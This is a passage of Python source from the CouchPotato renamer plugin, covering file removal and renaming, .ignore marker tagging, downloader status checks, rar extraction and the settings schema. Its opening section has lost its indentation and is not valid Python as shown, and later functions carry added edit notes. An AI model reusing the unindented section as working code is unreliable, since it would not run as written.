log.info('Same quality release already exists for %s, with quality %s. Assuming repack.', (media_title, release.get('quality')))
for file_type in release.get('files', {}):
for release_file in release['files'][file_type]:
remove_files.append(release_file)
remove_releases.append(release)
# Downloaded a lower quality, rename the newly downloaded files/folder to exclude them from scan
else:
log.info('Better quality release already exists for %s, with quality %s', (media_title, release.get('quality')))
# Add exists tag to the .ignore file
self.tagRelease(group = group, tag = 'exists')
# Notify on rename fail
download_message = 'Renaming of %s (%s) cancelled, exists in %s already.' % (media_title, group['meta_data']['quality']['label'], release.get('quality'))
fireEvent('movie.renaming.canceled', message = download_message, data = group)
remove_leftovers = False
break
elif release.get('status') in ['snatched', 'seeding']:
if release_download and release_download.get('release_id'):
if release_download['release_id'] == release['_id']:
if release_download['status'] == 'completed':
# Set the release to downloaded
fireEvent('release.update_status', release['_id'], status = 'downloaded', single = True)
group['release_download'] = release_download
mark_as_recent = True
elif release_download['status'] == 'seeding':
# Set the release to seeding
fireEvent('release.update_status', release['_id'], status = 'seeding', single = True)
mark_as_recent = True
elif release.get('quality') == group['meta_data']['quality']['identifier']:
# Set the release to downloaded
fireEvent('release.update_status', release['_id'], status = 'downloaded', single = True)
group['release_download'] = release_download
mark_as_recent = True
# Mark media for dashboard
if mark_as_recent:
fireEvent('media.tag', group['media'].get('_id'), 'recent', update_edited = True, single = True)
# Remove leftover files
if not remove_leftovers: # Don't remove anything
break
log.debug('Removing leftover files')
for current_file in group['files']['leftover']:
if self.conf('cleanup') and not self.conf('move_leftover') and \
(not keep_original or self.fileIsAdded(current_file, group)):
remove_files.append(current_file)
# Remove files
delete_folders = []
for src in remove_files:
if rename_files.get(src):
log.debug('Not removing file that will be renamed: %s', src)
continue
log.info('Removing "%s"', src)
try:
src = sp(src)
if os.path.isfile(src):
os.remove(src)
parent_dir = os.path.dirname(src)
if delete_folders.count(parent_dir) == 0 and os.path.isdir(parent_dir) and \
not isSubFolder(destination, parent_dir) and not isSubFolder(media_folder, parent_dir) and \
not isSubFolder(parent_dir, base_folder):
delete_folders.append(parent_dir)
except:
log.error('Failed removing %s: %s', (src, traceback.format_exc()))
self.tagRelease(group = group, tag = 'failed_remove')
# Delete leftover folder from older releases
for delete_folder in delete_folders:
try:
self.deleteEmptyFolder(delete_folder, show_error = False)
except Exception as e:
log.error('Failed to delete folder: %s %s', (e, traceback.format_exc()))
# Rename all files marked
group['renamed_files'] = []
failed_rename = False
for src in rename_files:
if rename_files[src]:
dst = rename_files[src]
log.info('Renaming "%s" to "%s"', (src, dst))
# Create dir
self.makeDir(os.path.dirname(dst))
try:
self.moveFile(src, dst, use_default = not is_torrent or self.fileIsAdded(src, group))
group['renamed_files'].append(dst)
except:
log.error('Failed renaming the file "%s" : %s', (os.path.basename(src), traceback.format_exc()))
failed_rename = True
break
# If renaming failed tag the release folder as failed and continue with next group. Note that all old files have already been deleted.
if failed_rename:
self.tagRelease(group = group, tag = 'failed_rename')
continue
# If renaming succeeded, make sure it is not tagged as failed (scanner didn't return a group, but a download_ID was provided in an earlier attempt)
else:
self.untagRelease(group = group, tag = 'failed_rename')
# Tag folder if it is in the 'from' folder and it will not be removed because it is a torrent
if self.movieInFromFolder(media_folder) and keep_original:
self.tagRelease(group = group, tag = 'renamed_already')
# Remove matching releases
for release in remove_releases:
log.debug('Removing release %s', release.get('identifier'))
try:
db.delete(release)
except:
log.error('Failed removing %s: %s', (release, traceback.format_exc()))
if group['dirname'] and group['parentdir'] and not keep_original:
if media_folder:
# Delete the movie folder
group_folder = media_folder
else:
# Delete the first empty subfolder in the tree relative to the 'from' folder
group_folder = sp(os.path.join(base_folder, os.path.relpath(group['parentdir'], base_folder).split(os.path.sep)[0]))
try:
log.info('Deleting folder: %s', group_folder)
self.deleteEmptyFolder(group_folder)
except:
log.error('Failed removing %s: %s', (group_folder, traceback.format_exc()))
# Notify on download, search for trailers etc
download_message = 'Downloaded %s (%s%s)' % (media_title, replacements['quality'], (' ' + replacements['3d']) if replacements['3d'] else '')
try:
fireEvent('renamer.after', message = download_message, group = group, in_order = True)
except:
log.error('Failed firing (some) of the renamer.after events: %s', traceback.format_exc())
# Break if CP wants to shut down
if self.shuttingDown():
break
self.renaming_started = False
def getRenameExtras(self, extra_type = '', replacements = None, folder_name = '', file_name = '', destination = '', group = None, current_file = '', remove_multiple = False):
    """Map each extra file belonging to *current_file* to its renamed target path.

    Returns a dict {source_path: destination_path} for every file of
    *extra_type* in the group that shares the current file's base name.
    """
    group = group or {}
    replacements = dict(replacements or {})
    renamed = {}

    # An extra belongs to the current file when it contains the current
    # file's name with the extension stripped off.
    base_name = current_file[:-len(replacements['ext'])]
    matching_extras = set(extra for extra in group['files'][extra_type] if base_name in sp(extra))

    for extra in matching_extras:
        # Each extra keeps its own extension in the rendered template.
        replacements['ext'] = getExt(extra)

        target_folder = self.doReplace(folder_name, replacements, remove_multiple = remove_multiple, folder = True)
        target_file = self.doReplace(file_name, replacements, remove_multiple = remove_multiple)
        renamed[extra] = os.path.join(destination, target_folder, target_file)

    return renamed
# Tag a release by dropping a marker file so the renamer skips it later.
def tagRelease(self, tag, group = None, release_download = None):
    """Create '<name>.<tag>.ignore' marker files next to the release files.

    The markers hide the release from subsequent renamer scans.
    Works either from a scanned *group* or from downloader info.
    """
    if not tag:
        return

    text = """This file is from CouchPotato
It has marked this release as "%s"
This file hides the release from the renamer
Remove it if you want it to be renamed (again, or at least let it try again)
""" % tag

    targets = []

    if isinstance(group, dict):
        # From a scanned group: tag only the first (sorted) movie file.
        targets = [sorted(list(group['files']['movie']))[0]]
    elif isinstance(release_download, dict):
        if release_download.get('files', []):
            # Tag the files the downloader reported, if they still exist.
            targets = [filename for filename in release_download.get('files', []) if os.path.exists(filename)]
        elif release_download['folder']:
            # Otherwise tag everything inside the download folder.
            for root, dirs, names in os.walk(sp(release_download['folder'])):
                targets.extend(os.path.join(root, name) for name in names)

    for target in targets:
        # Never tag the marker files themselves.
        if os.path.splitext(target)[1] == '.ignore':
            continue

        marker = '%s.%s.ignore' % (os.path.splitext(target)[0], tag)
        if not os.path.isfile(marker):
            self.createFile(marker, text)
def untagRelease(self, group = None, release_download = None, tag = ''):
    """Remove '<name>.<tag>.ignore' marker files for a release.

    Accepts either a scanned *group* or downloader info
    (*release_download*); an empty *tag* removes markers for any tag.

    Bug fix: the old guard `if not release_download: return` bailed out
    whenever only *group* was passed (e.g. `untagRelease(group = group,
    tag = 'failed_rename')`), so the group branch below was unreachable
    and those markers were never removed.
    """
    if not release_download and not group:
        return

    tag_files = []
    folder = None

    # Untag movie files if they are known
    if isinstance(group, dict):
        tag_files = [sorted(list(group['files']['movie']))[0]]
        folder = sp(group['parentdir'])
        if not group.get('dirname') or not os.path.isdir(folder):
            return False
    elif isinstance(release_download, dict):
        folder = sp(release_download['folder'])
        if not os.path.isdir(folder):
            return False

        # Untag download_files if they are known
        if release_download.get('files'):
            tag_files = release_download.get('files', [])
        # Untag all files in release folder
        else:
            for root, folders, names in os.walk(folder):
                tag_files.extend([sp(os.path.join(root, name)) for name in names if not os.path.splitext(name)[1] == '.ignore'])

    if not folder:
        return False

    # Find all .ignore files in folder
    ignore_files = []
    for root, dirnames, filenames in os.walk(folder):
        ignore_files.extend(fnmatch.filter([sp(os.path.join(root, filename)) for filename in filenames], '*%s.ignore' % tag))

    # Match all found ignore files with the tag_files and delete if found
    for tag_file in tag_files:
        ignore_file = fnmatch.filter(ignore_files, fnEscape('%s.%s.ignore' % (os.path.splitext(tag_file)[0], tag if tag else '*')))
        for filename in ignore_file:
            try:
                os.remove(filename)
            except:
                log.debug('Unable to remove ignore file: %s. Error: %s.' % (filename, traceback.format_exc()))
def hastagRelease(self, release_download, tag = ''):
    """Return True when a matching '.<tag>.ignore' marker exists for this download.

    With an empty *tag*, any '.ignore' marker counts.
    """
    if not release_download:
        return False

    folder = sp(release_download['folder'])
    if not os.path.isdir(folder):
        return False

    # Collect the candidate files: either the reported download files, or
    # every non-marker file found in the download folder.
    candidates = release_download.get('files') or []
    if not candidates:
        candidates = []
        for root, dirs, names in os.walk(folder):
            candidates.extend(sp(os.path.join(root, name)) for name in names if not os.path.splitext(name)[1] == '.ignore')

    # Collect every marker file for this tag within the folder.
    markers = []
    for root, dirs, names in os.walk(folder):
        markers.extend(fnmatch.filter([sp(os.path.join(root, name)) for name in names], '*%s.ignore' % tag))

    # A single candidate with a matching marker is enough.
    for candidate in candidates:
        pattern = fnEscape('%s.%s.ignore' % (os.path.splitext(candidate)[0], tag if tag else '*'))
        if fnmatch.filter(markers, pattern):
            return True

    return False
def moveFile(self, old, dest, use_default = False):
    """Transfer *old* to *dest* using the configured file action.

    The action is 'move', 'copy' or 'link'; *use_default* selects the
    'default_file_action' setting instead of the torrent-specific
    'file_action'. Raises on unrecoverable failure, returns True on
    success.
    """
    dest = sp(dest)
    try:
        move_type = self.conf('file_action')
        if use_default:
            # Non-torrent downloads use the general default action.
            move_type = self.conf('default_file_action')

        if move_type not in ['copy', 'link']:
            # Plain move. shutil.move can fail *after* the copy part
            # succeeded (e.g. removing the source); in that case the
            # destination exists and only the source needs cleanup.
            try:
                shutil.move(old, dest)
            except:
                if os.path.exists(dest):
                    log.error('Successfully moved file "%s", but something went wrong: %s', (dest, traceback.format_exc()))
                    os.unlink(old)
                else:
                    raise
        elif move_type == 'copy':
            shutil.copy(old, dest)
        else:
            # 'link': try hardlink first, fall back to copy + symlink,
            # and finally settle for a plain copy.
            try:
                log.debug('Hardlinking file "%s" to "%s"...', (old, dest))
                link(old, dest)
            except:
                # Try to simlink next
                log.debug('Couldn\'t hardlink file "%s" to "%s". Symlinking instead. Error: %s.', (old, dest, traceback.format_exc()))
                shutil.copy(old, dest)
                try:
                    # Replace the original with a symlink to the copy so
                    # the torrent can keep seeding from the old path.
                    symlink(dest, old + '.link')
                    os.unlink(old)
                    os.rename(old + '.link', old)
                except:
                    log.error('Couldn\'t symlink file "%s" to "%s". Copied instead. Error: %s. ', (old, dest, traceback.format_exc()))

        try:
            # Best-effort permission fixup; never fatal.
            os.chmod(dest, Env.getPermission('file'))
            if os.name == 'nt' and self.conf('ntfs_permission'):
                # Reset NTFS ACLs so the file inherits from its new folder.
                os.popen('icacls "' + dest + '"* /reset /T')
        except:
            log.debug('Failed setting permissions for file: %s, %s', (dest, traceback.format_exc(1)))
    except:
        log.error('Couldn\'t move file "%s" to "%s": %s', (old, dest, traceback.format_exc()))
        raise

    return True
def doReplace(self, string, replacements, remove_multiple = False, folder = False):
    """Substitute <tag> placeholders in a naming template with real values."""
    replacements = replacements.copy()
    if remove_multiple:
        # Multi-part markers are dropped when renaming a single-part release.
        replacements['cd'] = ''
        replacements['cd_nr'] = ''

    late_tags = ['thename', 'namethe']
    result = toUnicode(string)

    # First pass: everything except the "late" tags, which must survive
    # the double-separator cleanup below untouched.
    for tag, value in replacements.items():
        if tag in late_tags:
            continue
        if value is None:
            # Missing information: strip the tag from the name entirely.
            result = result.replace('<' + tag + '>', '')
        else:
            result = result.replace(six.u('<%s>') % toUnicode(tag), toUnicode(value))

    result = self.replaceDoubles(result.lstrip('. '))

    # Second pass: fill in the late tags after cleanup.
    for tag, value in replacements.items():
        if tag in late_tags:
            result = result.replace(six.u('<%s>') % toUnicode(tag), toUnicode(value))

    # Strip characters that are illegal in file names.
    result = re.sub(r"[\x00:\*\?\"<>\|]", '', result)

    separator = self.conf('foldersep') if folder else self.conf('separator')
    return result.replace(' ', ' ' if not separator else separator)
def replaceDoubles(self, string):
    """Collapse repeated separator characters left behind by empty template tags.

    Runs a fixed sequence of regex substitutions (repeated dots,
    underscores, dashes, whitespace, separator/dot combinations) and
    returns the cleaned string.
    """
    # Raw strings make the regex escapes explicit; the old plain strings
    # ('\.', '\s', ...) are invalid escape sequences that raise
    # DeprecationWarnings on modern Python.
    replaces = [
        (r'\.+', '.'), (r'_+', '_'), (r'-+', '-'), (r'\s+', ' '), (r' \\', r'\\'), (' /', '/'),
        (r'(\s\.)+', '.'), (r'(-\.)+', '.'), (r'(\s-)+', '-'),
    ]

    # Order matters: whitespace is collapsed before the combined
    # separator+dot patterns are cleaned up.
    for reg, replace_with in replaces:
        string = re.sub(reg, replace_with, string)

    return string
def checkSnatched(self, fire_scan = True):
    """Poll the downloaders for the status of snatched/seeding/missing releases.

    Updates release statuses accordingly, queues completed/seeding
    downloads for a renamer scan, and (when *fire_scan* is True)
    triggers a folder scan where needed. Returns True on a completed
    check, False when already running or on error.
    """
    # Re-entrancy guard: only one status check at a time.
    if self.checking_snatched:
        log.debug('Already checking snatched')
        return False

    self.checking_snatched = True
    try:
        db = get_db()
        rels = list(fireEvent('release.with_status', ['snatched', 'seeding', 'missing'], single = True))

        if not rels:
            #No releases found that need status checking
            self.checking_snatched = False
            return True

        # Collect all download information with the download IDs from the releases
        download_ids = []
        no_status_support = []
        try:
            for rel in rels:
                if not rel.get('download_info'): continue

                if rel['download_info'].get('id') and rel['download_info'].get('downloader'):
                    download_ids.append(rel['download_info'])

                # Downloaders that can't report status are tracked so a
                # plain folder scan can be forced instead.
                ds = rel['download_info'].get('status_support')
                if ds is False or ds == 'False':
                    no_status_support.append(ss(rel['download_info'].get('downloader')))
        except:
            log.error('Error getting download IDs from database')
            self.checking_snatched = False
            return False

        release_downloads = fireEvent('download.status', download_ids, merge = True) if download_ids else []

        if len(no_status_support) > 0:
            log.debug('Download status functionality is not implemented for one of the active downloaders: %s', list(set(no_status_support)))

        if not release_downloads:
            if fire_scan:
                self.scan()

            self.checking_snatched = False
            return True

        scan_releases = []
        scan_required = False

        log.debug('Checking status snatched releases...')

        try:
            for rel in rels:
                movie_dict = db.get('id', rel.get('media_id'))
                download_info = rel.get('download_info')

                if not isinstance(download_info, dict):
                    log.error('Faulty release found without any info, ignoring.')
                    fireEvent('release.update_status', rel.get('_id'), status = 'ignored', single = True)
                    continue

                # Check if download ID is available
                if not download_info.get('id') or not download_info.get('downloader'):
                    log.debug('Download status functionality is not implemented for downloader (%s) of release %s.', (download_info.get('downloader', 'unknown'), rel['info']['name']))
                    scan_required = True

                    # Continue with next release
                    continue

                # Find release in downloaders
                nzbname = self.createNzbName(rel['info'], movie_dict)

                found_release = False
                for release_download in release_downloads:
                    found_release = False
                    if download_info.get('id'):
                        # Preferred match: downloader + its download ID.
                        if release_download['id'] == download_info['id'] and release_download['downloader'] == download_info['downloader']:
                            log.debug('Found release by id: %s', release_download['id'])
                            found_release = True
                            break
                    else:
                        # Fallback match: by name or embedded IMDB id.
                        if release_download['name'] == nzbname or rel['info']['name'] in release_download['name'] or getImdb(release_download['name']) == getIdentifier(movie_dict):
                            log.debug('Found release by release name or imdb ID: %s', release_download['name'])
                            found_release = True
                            break

                if not found_release:
                    log.info('%s not found in downloaders', nzbname)

                    #Check status if already missing and for how long, if > 1 week, set to ignored else to missing
                    if rel.get('status') == 'missing':
                        if rel.get('last_edit') < int(time.time()) - 7 * 24 * 60 * 60:
                            fireEvent('release.update_status', rel.get('_id'), status = 'ignored', single = True)
                    else:
                        # Set the release to missing
                        fireEvent('release.update_status', rel.get('_id'), status = 'missing', single = True)

                    # Continue with next release
                    continue

                # Log that we found the release
                timeleft = 'N/A' if release_download['timeleft'] == -1 else release_download['timeleft']
                log.debug('Found %s: %s, time to go: %s', (release_download['name'], release_download['status'].upper(), timeleft))

                # Check status of release
                if release_download['status'] == 'busy':
                    # Set the release to snatched if it was missing before
                    fireEvent('release.update_status', rel.get('_id'), status = 'snatched', single = True)

                    # Tag folder if it is in the 'from' folder and it will not be processed because it is still downloading
                    if self.movieInFromFolder(release_download['folder']):
                        self.tagRelease(release_download = release_download, tag = 'downloading')

                elif release_download['status'] == 'seeding':
                    #If linking setting is enabled, process release
                    if self.conf('file_action') != 'move' and not rel.get('status') == 'seeding' and self.statusInfoComplete(release_download):
                        log.info('Download of %s completed! It is now being processed while leaving the original files alone for seeding. Current ratio: %s.', (release_download['name'], release_download['seed_ratio']))

                        # Remove the downloading tag
                        self.untagRelease(release_download = release_download, tag = 'downloading')

                        # Scan and set the torrent to paused if required
                        release_download.update({'pause': True, 'scan': True, 'process_complete': False})
                        scan_releases.append(release_download)
                    else:
                        #let it seed
                        log.debug('%s is seeding with ratio: %s', (release_download['name'], release_download['seed_ratio']))

                        # Set the release to seeding
                        fireEvent('release.update_status', rel.get('_id'), status = 'seeding', single = True)

                elif release_download['status'] == 'failed':
                    # Set the release to failed
                    fireEvent('release.update_status', rel.get('_id'), status = 'failed', single = True)

                    fireEvent('download.remove_failed', release_download, single = True)

                    if self.conf('next_on_failed'):
                        fireEvent('movie.searcher.try_next_release', media_id = rel.get('media_id'))

                elif release_download['status'] == 'completed':
                    log.info('Download of %s completed!', release_download['name'])

                    #Make sure the downloader sent over a path to look in
                    if self.statusInfoComplete(release_download):

                        # If the release has been seeding, process now the seeding is done
                        if rel.get('status') == 'seeding':
                            if self.conf('file_action') != 'move':
                                # Set the release to done as the movie has already been renamed
                                fireEvent('release.update_status', rel.get('_id'), status = 'downloaded', single = True)

                                # Allow the downloader to clean-up
                                release_download.update({'pause': False, 'scan': False, 'process_complete': True})
                                scan_releases.append(release_download)
                            else:
                                # Scan and Allow the downloader to clean-up
                                release_download.update({'pause': False, 'scan': True, 'process_complete': True})
                                scan_releases.append(release_download)
                        else:
                            # Set the release to snatched if it was missing before
                            fireEvent('release.update_status', rel.get('_id'), status = 'snatched', single = True)

                            # Remove the downloading tag
                            self.untagRelease(release_download = release_download, tag = 'downloading')

                            # Scan and Allow the downloader to clean-up
                            release_download.update({'pause': False, 'scan': True, 'process_complete': True})
                            scan_releases.append(release_download)
                    else:
                        scan_required = True
        except:
            log.error('Failed checking for release in downloader: %s', traceback.format_exc())

        # The following can either be done here, or inside the scanner if we pass it scan_items in one go
        for release_download in scan_releases:
            # Ask the renamer to scan the item
            if release_download['scan']:
                if release_download['pause'] and self.conf('file_action') == 'link':
                    fireEvent('download.pause', release_download = release_download, pause = True, single = True)
                self.scan(release_download = release_download)
                if release_download['pause'] and self.conf('file_action') == 'link':
                    fireEvent('download.pause', release_download = release_download, pause = False, single = True)
            if release_download['process_complete']:
                # First make sure the files were successfully processed
                if not self.hastagRelease(release_download = release_download, tag = 'failed_rename'):
                    # Remove the seeding tag if it exists
                    self.untagRelease(release_download = release_download, tag = 'renamed_already')
                    # Ask the downloader to process the item
                    fireEvent('download.process_complete', release_download = release_download, single = True)

        if fire_scan and (scan_required or len(no_status_support) > 0):
            self.scan()

        self.checking_snatched = False
        return True
    except:
        log.error('Failed checking snatched: %s', traceback.format_exc())

    self.checking_snatched = False
    return False
def extendReleaseDownload(self, release_download):
    """Enrich a downloader status dict with data from the matching release record."""
    db = get_db()
    rls = None

    if release_download and release_download.get('id'):
        downloader = release_download.get('downloader')
        download_id = release_download.get('id')
        try:
            # release_download documents are keyed '<downloader>-<id>'.
            rls = db.get('release_download', '%s-%s' % (downloader, download_id), with_doc = True)['doc']
        except:
            log.error('Download ID %s from downloader %s not found in releases', (download_id, downloader))

    if rls:
        media = db.get('id', rls['media_id'])
        release_download.update({
            'imdb_id': getIdentifier(media),
            'quality': rls['quality'],
            'is_3d': rls['is_3d'],
            'protocol': rls.get('info', {}).get('protocol') or rls.get('info', {}).get('type'),
            'release_id': rls['_id'],
        })

    return release_download
def downloadIsTorrent(self, release_download):
    """True when the download arrived over a torrent protocol."""
    torrent_protocols = ['torrent', 'torrent_magnet']
    return release_download and release_download.get('protocol') in torrent_protocols
def fileIsAdded(self, src, group):
    """Whether *src* is one of the files recorded before the rename started."""
    before = (group or {}).get('before_rename')
    if not before:
        return False
    return src in before
def moveTypeIsLinked(self):
    """True when the default file action leaves the original file in place."""
    non_destructive_actions = ('copy', 'link')
    return self.conf('default_file_action') in non_destructive_actions
def statusInfoComplete(self, release_download):
    """All fields needed to locate the download on disk are present."""
    identified = release_download.get('id') and release_download.get('downloader')
    return identified and release_download.get('folder')
def movieInFromFolder(self, media_folder):
    """True when the release lives inside the configured 'from' folder.

    Also True when no folder is known at all (nothing to exclude).
    """
    if not media_folder:
        return True
    return isSubFolder(media_folder, sp(self.conf('from')))
def extractFiles(self, folder = None, media_folder = None, files = None, cleanup = False):
    """Find and extract rar archives, relocating results to the 'from' folder.

    Returns the (possibly updated) (folder, media_folder, files,
    extr_files) tuple for the renamer to continue with.
    """
    if not files: files = []

    # RegEx for finding rar files
    # Matches '.rar' and multi-part '.part01.rar' first volumes.
    archive_regex = '(?P<file>^(?P<base>(?:(?!\.part\d+\.rar$).)*)\.(?:(?:part0*1\.)?rar)$)'
    # Matches the remaining volumes (.part02.rar / .r00-style) of a set.
    restfile_regex = '(^%s\.(?:part(?!0*1\.rar$)\d+\.rar$|[rstuvw]\d+$))'
    extr_files = []

    from_folder = sp(self.conf('from'))

    # Check input variables
    if not folder:
        folder = from_folder

    # Only age-check archives when scanning the general 'from' folder;
    # a specific media folder is assumed to be fully downloaded.
    check_file_date = True
    if media_folder:
        check_file_date = False

    if not files:
        for root, folders, names in os.walk(folder):
            files.extend([sp(os.path.join(root, name)) for name in names])

    # Find all archive files
    archives = [re.search(archive_regex, name).groupdict() for name in files if re.search(archive_regex, name)]

    #Extract all found archives
    for archive in archives:
        # Check if it has already been processed by CPS
        if self.hastagRelease(release_download = {'folder': os.path.dirname(archive['file']), 'files': archive['file']}):
            continue

        # Find all related archive files
        archive['files'] = [name for name in files if re.search(restfile_regex % re.escape(archive['base']), name)]
        archive['files'].append(archive['file'])

        # Check if archive is fresh and maybe still copying/moving/downloading, ignore files newer than 1 minute
        if check_file_date:
            files_too_new, time_string = self.checkFilesChanged(archive['files'])

            if files_too_new:
                log.info('Archive seems to be still copying/moving/downloading or just copied/moved/downloaded (created on %s), ignoring for now: %s', (time_string, os.path.basename(archive['file'])))
                continue

        log.info('Archive %s found. Extracting...', os.path.basename(archive['file']))
        try:
            rar_handle = RarFile(archive['file'], custom_path = self.conf('unrar_path'))
            # Extract into the 'from' folder, mirroring the archive's
            # position relative to the scanned folder.
            extr_path = os.path.join(from_folder, os.path.relpath(os.path.dirname(archive['file']), folder))
            self.makeDir(extr_path)
            for packedinfo in rar_handle.infolist():
                extr_file_path = sp(os.path.join(extr_path, os.path.basename(packedinfo.filename)))
                if not packedinfo.isdir and not os.path.isfile(extr_file_path):
                    log.debug('Extracting %s...', packedinfo.filename)
                    rar_handle.extract(condition = [packedinfo.index], path = extr_path, withSubpath = False, overwrite = False)
                    if self.conf('unrar_modify_date'):
                        try:
                            # Carry over the archive's timestamps to the
                            # extracted file (helps media centers).
                            os.utime(extr_file_path, (os.path.getatime(archive['file']), os.path.getmtime(archive['file'])))
                        except:
                            log.error('Rar modify date enabled, but failed: %s', traceback.format_exc())
                    extr_files.append(extr_file_path)
            del rar_handle
        except Exception as e:
            log.error('Failed to extract %s: %s %s', (archive['file'], e, traceback.format_exc()))
            continue

        # Delete the archive files
        for filename in archive['files']:
            if cleanup:
                try:
                    os.remove(filename)
                except Exception as e:
                    log.error('Failed to remove %s: %s %s', (filename, e, traceback.format_exc()))
                    # Keep the file in the list when deletion failed.
                    continue
            files.remove(filename)

    # Move the rest of the files and folders if any files are extracted to the from folder (only if folder was provided)
    if extr_files and folder != from_folder:
        for leftoverfile in list(files):
            move_to = os.path.join(from_folder, os.path.relpath(leftoverfile, folder))

            try:
                self.makeDir(os.path.dirname(move_to))
                self.moveFile(leftoverfile, move_to, cleanup)
            except Exception as e:
                log.error('Failed moving left over file %s to %s: %s %s', (leftoverfile, move_to, e, traceback.format_exc()))
                # As we probably tried to overwrite the nfo file, check if it exists and then remove the original
                if os.path.isfile(move_to):
                    if cleanup:
                        log.info('Deleting left over file %s instead...', leftoverfile)
                        os.unlink(leftoverfile)
                else:
                    continue

            files.remove(leftoverfile)
            extr_files.append(move_to)

        if cleanup:
            # Remove all left over folders
            log.debug('Removing old movie folder %s...', media_folder)
            self.deleteEmptyFolder(media_folder)

        media_folder = os.path.join(from_folder, os.path.relpath(media_folder, folder))
        folder = from_folder

    if extr_files:
        files.extend(extr_files)

    # Cleanup files and folder if media_folder was not provided
    if not media_folder:
        files = []
        folder = None

    return folder, media_folder, files, extr_files
# Placeholder tags available in the folder/file naming templates below.
# 'pre'/'post' delimit a tag; 'choices' maps each tag to its UI label.
rename_options = {
    'pre': '<',
    'post': '>',
    'choices': {
        'ext': 'Extension (mkv)',  # typo fix: was 'Extention'
        'namethe': 'Moviename, The',
        'thename': 'The Moviename',
        'year': 'Year (2011)',
        'first': 'First letter (M)',
        'quality': 'Quality (720p)',
        'quality_type': '(HD) or (SD)',
        '3d': '3D',
        '3d_type': '3D Type (Full SBS)',
        'video': 'Video (x264)',
        'audio': 'Audio (DTS)',
        'group': 'Releasegroup name',
        'source': 'Source media (Bluray)',
        'resolution_width': 'resolution width (1280)',
        'resolution_height': 'resolution height (720)',
        'audio_channels': 'audio channels (7.1)',
        'original': 'Original filename',
        'original_folder': 'Original foldername',
        'imdb_id': 'IMDB id (tt0123456)',
        'cd': 'CD number (cd1)',
        'cd_nr': 'Just the cd nr. (1)',
        'mpaa': 'MPAA or other certification',
        'mpaa_only': 'MPAA only certification (G|PG|PG-13|R|NC-17|Not Rated)',
        'category': 'Category label',
    },
}
# Settings UI definition for the renamer plugin (typo fixes in the
# user-facing help texts; structure and option names unchanged).
config = [{
    'name': 'renamer',
    'order': 40,
    'description': 'Move and rename your downloaded movies to your movie directory.',
    'groups': [
        {
            'tab': 'renamer',
            'name': 'renamer',
            'label': 'Rename downloaded movies',
            'wizard': True,
            'options': [
                {
                    'name': 'enabled',
                    'default': False,
                    'type': 'enabler',
                },
                {
                    'name': 'from',
                    'type': 'directory',
                    'description': 'Folder where CP searches for movies.',
                },
                {
                    'name': 'to',
                    'type': 'directory',
                    'description': 'Default folder where the movies are moved to.',
                },
                {
                    'name': 'to if 3d',
                    'type': 'directory',
                    'description': 'Default folder where the movies are moved to if 3D.',
                },
                {
                    'name': 'folder_name',
                    'label': 'Folder naming',
                    'description': 'Name of the folder. Keep empty for no folder.',
                    'default': '<namethe> (<year>)',
                    'type': 'choice',
                    'options': rename_options
                },
                {
                    'name': 'folder_name_3d',
                    'label': 'Folder naming if 3D',
                    'description': 'Name of the folder for 3D. Keep empty for no folder.',
                    'default': '<namethe> <3d> (<year>)',
                    'type': 'choice',
                    'options': rename_options
                },
                {
                    'name': 'file_name',
                    'label': 'File naming',
                    'description': 'Name of the file',
                    'default': '<thename><cd>.<ext>',
                    'type': 'choice',
                    'options': rename_options
                },
                {
                    'name': 'file_name_3d',
                    'label': 'File naming if 3D',
                    'description': 'Name of the file for 3D',
                    'default': '<thename><cd> <3d>.<ext>',
                    'type': 'choice',
                    'options': rename_options
                },
                {
                    'advanced': True,
                    'name': 'unrar_modify_date',
                    'type': 'bool',
                    'description': ('Set modify date of unrar-ed files to the rar-file\'s date.', 'This will allow XBMC to recognize extracted files as recently added even if the movie was released some time ago.'),
                    'default': False,
                },
                {
                    'name': 'cleanup',
                    'type': 'bool',
                    'description': 'Cleanup leftover files after successful rename.',
                    'default': False,
                },
                {
                    'advanced': True,
                    'name': 'run_every',
                    'label': 'Run every',
                    'default': 1,
                    'type': 'int',
                    'unit': 'min(s)',
                    'description': ('Detect movie status every X minutes.', 'Will start the renamer if movie is <strong>completed</strong> or handle <strong>failed</strong> download if these options are enabled'),
                },
                {
                    'advanced': True,
                    'name': 'force_every',
                    'label': 'Force every',
                    'default': 2,
                    'type': 'int',
                    'unit': 'hour(s)',
                    'description': 'Forces the renamer to scan every X hours',
                },
                {
                    'advanced': True,
                    'name': 'next_on_failed',
                    'default': True,
                    'type': 'bool',
                    'description': 'Try the next best release for a movie after a download failed.',
                },
                {
                    'name': 'move_leftover',
                    'type': 'bool',
                    'description': 'Move all leftover file after renaming, to the movie folder.',
                    'default': False,
                    'advanced': True,
                },
                {
                    'advanced': True,
                    'name': 'separator',
                    'label': 'File-Separator',
                    'description': ('Replace all the spaces with a character.', 'Example: ".", "-" (without quotes). Leave empty to use spaces.'),
                },
                {
                    'advanced': True,
                    'name': 'foldersep',
                    'label': 'Folder-Separator',
                    'description': ('Replace all the spaces with a character.', 'Example: ".", "-" (without quotes). Leave empty to use spaces.'),
                },
                {
                    'name': 'default_file_action',
                    'label': 'Default File Action',
                    'default': 'move',
                    'type': 'dropdown',
                    'values': [('Link', 'link'), ('Copy', 'copy'), ('Move', 'move')],
                    # Fixed dead wiki link: 'Sym_link' -> 'Symbolic_link'.
                    'description': ('<strong>Link</strong>, <strong>Copy</strong> or <strong>Move</strong> after download completed.',
                                    'Link first tries <a href="http://en.wikipedia.org/wiki/Hard_link">hard link</a>, then <a href="http://en.wikipedia.org/wiki/Symbolic_link">sym link</a> and falls back to Copy.'),
                    'advanced': True,
                },
                {
                    'name': 'file_action',
                    'label': 'Torrent File Action',
                    'default': 'link',
                    'type': 'dropdown',
                    'values': [('Link', 'link'), ('Copy', 'copy'), ('Move', 'move')],
                    # Typo fixes: 'prefered' -> 'preferred', 'beeing' -> 'being'.
                    'description': 'See above. It is preferred to use link when downloading torrents as it will save you space, while still being able to seed.',
                    'advanced': True,
                },
                {
                    'advanced': True,
                    'name': 'ntfs_permission',
                    'label': 'NTFS Permission',
                    'type': 'bool',
                    'hidden': os.name != 'nt',
                    'description': 'Set permission of moved files to that of destination folder (Windows NTFS only).',
                    'default': False,
                },
            ],
        }, {
            'tab': 'renamer',
            'name': 'meta_renamer',
            'label': 'Advanced renaming',
            # Typo fix: 'extention' -> 'extension'.
            'description': 'Meta data file renaming. Use <filename> to use the above "File naming" settings, without the file extension.',
            'advanced': True,
            'options': [
                {
                    'name': 'rename_nfo',
                    'label': 'Rename .NFO',
                    'description': 'Rename original .nfo file',
                    'type': 'bool',
                    'default': True,
                },
                {
